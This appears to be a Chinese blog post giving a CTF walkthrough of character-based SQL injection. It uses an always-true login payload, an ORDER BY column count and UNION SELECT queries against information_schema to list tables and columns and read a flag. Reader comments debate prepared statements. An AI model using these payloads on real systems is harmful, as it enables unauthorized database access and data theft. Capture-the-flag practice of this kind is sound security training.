Sql注入

博主： wxy05240
发布时间：2023 年 08 月 06 日
6954 次浏览
7 条评论
1132字数
分类： WEB CTF

字符型注入

判断注入类型

admin' or 1=1 #

获取当前表列数与数据库名称

order by 3时还有结果，order by 4无结果，故有3列

采用联合查询获取数据库名称为web2

admin' or 1=1 union select 1,database(),3#

获取当前数据库内所有表名

admin' or 1=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#

获取flag表内字段

admin' or 1=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag'),3#

获取flag

admin' or 1=1 union select 1,(select flag from flag),3#

最后修改：2023 年 08 月 06 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

Loading...

7 条评论

ralozzzcct
November 14th, 2024 at 05:16 am

博主太厉害了！

回复
寒青
November 23rd, 2023 at 02:45 pm

csacsa

回复
1. wxy05240
  November 23rd, 2023 at 02:46 pm
  
  @寒青
  
  qwe
  
  回复
寒青
November 23rd, 2023 at 02:36 pm

写的可以哦

回复
wxy05240 1
November 23rd, 2023 at 02:30 pm

没有绝对的预处理，总会有各种注入绕过

回复
ccbbp
November 11th, 2023 at 11:47 am

用预处理的话很难被注入了吧

回复
1. wxy05240
  November 19th, 2023 at 01:21 pm
  
  @ccbbp
  
  没有绝对的预处理，总会有各种注入绕过
  
  回复

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

夜/日间模式

固定头部

固定导航

折叠导航

置顶导航

盒子模型

深色模式（自动）